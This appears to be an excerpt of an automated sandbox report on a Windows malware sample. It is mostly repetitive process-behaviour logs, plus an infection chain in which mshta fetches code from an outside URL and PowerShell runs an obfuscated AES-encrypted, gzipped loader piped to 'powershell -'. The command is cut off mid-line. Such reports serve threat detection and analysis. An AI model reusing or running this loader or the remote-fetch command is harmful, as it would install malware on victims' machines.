Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 13_2_00007FFAAB0210F0 sldt word ptr [eax]

13_2_00007FFAAB0210F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3133	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2524	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6229	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3554	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6815	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2709	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Evaded block: after key decision	graph_21-86757
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Evaded block: after key decision	graph_21-86900
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Evaded block: after key decision	graph_21-87051
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Evaded block: after key decision	graph_21-88620

Source: C:\Users\user\AppData\Local\Temp\putty.exe

API coverage: 4.7 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7804	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 8032	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5372	Thread sleep count: 6815 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5372	Thread sleep count: 2709 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2E3F40 FindFirstFileA,FindClose,	21_2_00007FF6BB2E3F40
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2D6B00 GetProcAddress,FindFirstFileA,CloseHandle,	21_2_00007FF6BB2D6B00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2B0520 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,	21_2_00007FF6BB2B0520
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB2E2190 FindFirstFileA,FindClose,FindWindowA,	21_2_00007FF6BB2E2190

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: mshta.exe, 00000007.00000003.1429253455.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686DC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWindowClass
Source: mshta.exe, 00000007.00000003.1419941933.0000022686E31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686E31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1429253455.0000022686D91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1413222166.0000022686E31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000003.1377641844.0000022686D8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1439531858.0000022686E31000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000007.00000002.1433029163.0000022686D94000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2577976686.000001E7B9C56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000009.00000002.2576197195.000001E7B462B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: powershell.exe, 0000000D.00000002.1757602646.000001B4E98D9000.00000004.00000020.00020000.00000000.sdmp, putty.exe, 00000015.00000002.2573394852.000002295070C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 21_2_00007FF6BB35B7AC IsDebuggerPresent,OutputDebugStringW,

21_2_00007FF6BB35B7AC

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB33AC78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		21_2_00007FF6BB33AC78
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 21_2_00007FF6BB354664 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		21_2_00007FF6BB354664

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 8120, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" http://ukr-netdigitalhub.pro/x64dbg2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $eoXTm = 'AAAAAAAAAAAAAAAAAAAAAOhRfbfB0Z9oGAoMOSgiWW1szkJpy8tdpzZDtTrcpHQQScNLpta757CP3/Lp9GzqMSWF/7chhFbpK5jnKm5l5GflMVIeicKnQ3tCZoPwc82rCUKi+CN+28+YgJKXEr7fHV7bfPtkkKl/IfCV5knblgZoHjLo4alPfj3vVP9+W9dBhO1jttLCgLMu7VdweZbJhA9uHOeLEKlpTmwZhy6SBRt+2wZEQ+dEohArTgBqoSvdX1qI7jixQKp5YBiIhsJS7u1Qvr/smE9NMnRlLj8eZrE59UY+w09WbevvaCeXh61O6h2aDTpepoYId9+yEwU1DPB0GqmbzCA9QdOulsJz6fVjaGogYMrT5S7XHNY3b3K8Fds6PLI9RHngZogzd88E91dJ6Cp8l8L/0YhXqmbYzQWWtalFkji34QstydprFtIIkBj5NVpQsyMwuAirXLzRAYWUXfeXCL3bsXMbhndHMmjL5UIxljin3QbIc2iew7JoG9NPIrW1cJfuakC0Y/jFAEgey3tAySeNXUsyn3/Kdn7oJodxLIwRjwHaRO3ZSEvHxH3ar969bzsawhe34Ij3+d5OxiDnJyriW04WUQmnSpB1IiiK4H4ozAiv0sv12aPGF8M5NRhzJu5xw+dCgvgsCfFx1DUJKwQ45ufm9okusl0jpVx/O+uTL+C+FQgu6Pua4CqcOdudMNHchFijnXMID9n3adXAQrcb1tSG8Brkp0jI3sJ2d3eDgc5ERd3aZTVLrVW9YlDfWNKaNDKY0xTYJy2El0nQ1GJXLH9ZEqQjU5MWZDkryrQ2MJMkbIoRuofhdgf1Lbm0S6cGLVrPnryhnI9zO+hc3RM1f3C+NWNNFesGiRNQ8BKhRbBeJPuKvNyofEthadpJdc7RwBzuvcVrz8PfmhSwy+CNbj+mIRYU9mFJiv9fT4YKiVpQsGiZxKUu';$kPWuaVGM = 'Y1ZpbW5aY0ZUT2xpV0ZVd2FHbGNzS0Z6b2hBSHN5ZVg=';$gnuKIz = New-Object 'System.Security.Cryptography.AesManaged';$gnuKIz.Mode = [System.Security.Cryptography.CipherMode]::ECB;$gnuKIz.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$gnuKIz.BlockSize = 128;$gnuKIz.KeySize = 256;$gnuKIz.Key = [System.Convert]::FromBase64String($kPWuaVGM);$hGgdN = [System.Convert]::FromBase64String($eoXTm);$RaRaLJdR = $hGgdN[0..15];$gnuKIz.IV = $RaRaLJdR;$jhyJONfqz = $gnuKIz.CreateDecryptor();$ugCNpUbNf = $jhyJONfqz.TransformFinalBlock($hGgdN, 16, $hGgdN.Length - 16);$gnuKIz.Dispose();$mNOLJITf = New-Object System.IO.MemoryStream( , $ugCNpUbNf );$pvQGtgpn = New-Object System.IO.MemoryStream;$AjWBPWyhL = New-Object System.IO.Compression.GzipStream $mNOLJITf, ([IO.Compression.CompressionMode]::Decompress);$AjWBPWyhL.CopyTo( $pvQGtgpn );$AjWBPWyhL.Close();$mNOLJITf.Close();[byte[]] $AeGlbG = $pvQGtgpn.ToArray();$qNgJt = [System.Text.Encoding]::UTF8.GetString($AeGlbG);$qNgJt \| powershell -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user~1\AppData\Local\Temp\x64dbg.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putty.exe "C:\Users\user~1\AppData\Local\Temp\putty.exe"	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop $eoxtm = 'aaaaaaaaaaaaaaaaaaaaaohrfbfb0z9ogaomosgiww1szkjpy8tdpzzdttrcphqqscnlpta757cp3/lp9gzqmswf/7chhfbpk5jnkm5l5gflmvieicknq3tczopwc82rcuki+cn+28+ygjkxer7fhv7bfptkkkl/ifcv5knblgzohjlo4alpfj3vvp9+w9dbho1jttlcglmu7vdwezbjha9uhoeleklptmwzhy6sbrt+2wzeq+deohartgbqosvdx1qi7jixqkp5ybiihsjs7u1qvr/sme9nmnrllj8ezre59uy+w09wbevvacexh61o6h2adtpepoyid9+yewu1dpb0gqmbzca9qdoulsjz6fvjagogymrt5s7xhny3b3k8fds6pli9rhngzogzd88e91dj6cp8l8l/0yhxqmbyzqwwtalfkji34qstydprftiikbj5nvpqsymwuairxlzraywuxfexcl3bsxmbhndhmmjl5uixljin3qbic2iew7jog9npirw1cjfuakc0y/jfaegey3taysenxusyn3/kdn7ojodxliwrjwharo3zsevhxh3ar969bzsawhe34ij3+d5oxidnjyriw04wuqmnspb1iiik4h4ozaiv0sv12apgf8m5nrhzju5xw+dcgvgscffx1dujkwq45ufm9okusl0jpvx/o+utl+c+fqgu6pua4cqcodudmnhchfijnxmid9n3adxaqrcb1tsg8brkp0ji3sj2d3edgc5erd3aztvlrvw9yldfwnkandky0xtyjy2el0nq1gjxlh9zeqqju5mwzdkryrq2mjmkbioruofhdgf1lbm0s6cglvrpnryhni9zo+hc3rm1f3c+nwnnfesgirnq8bkhrbbejpukvnyofethadpjdc7rwbzuvcvrz8pfmhswy+cnbj+miryu9mfjiv9ft4ykivpqsgizxkuu';$kpwuavgm = 'y1zpbw5ay0zut2xpv0zvd2fhbgnzs0z6b2hbshn5zvg=';$gnukiz = new-object 'system.security.cryptography.aesmanaged';$gnukiz.mode = [system.security.cryptography.ciphermode]::ecb;$gnukiz.padding = [system.security.cryptography.paddingmode]::zeros;$gnukiz.blocksize = 128;$gnukiz.keysize = 256;$gnukiz.key = [system.convert]::frombase64string($kpwuavgm);$hggdn = [system.convert]::frombase64string($eoxtm);$raraljdr = $hggdn[0..15];$gnukiz.iv = $raraljdr;$jhyjonfqz = $gnukiz.createdecryptor();$ugcnpubnf = $jhyjonfqz.transformfinalblock($hggdn, 16, $hggdn.length - 16);$gnukiz.dispose();$mnoljitf = new-object system.io.memorystream( , $ugcnpubnf );$pvqgtgpn = new-object system.io.memorystream;$ajwbpwyhl = new-object system.io.compression.gzipstream $mnoljitf, ([io.compression.compressionmode]::decompress);$ajwbpwyhl.copyto( $pvqgtgpn 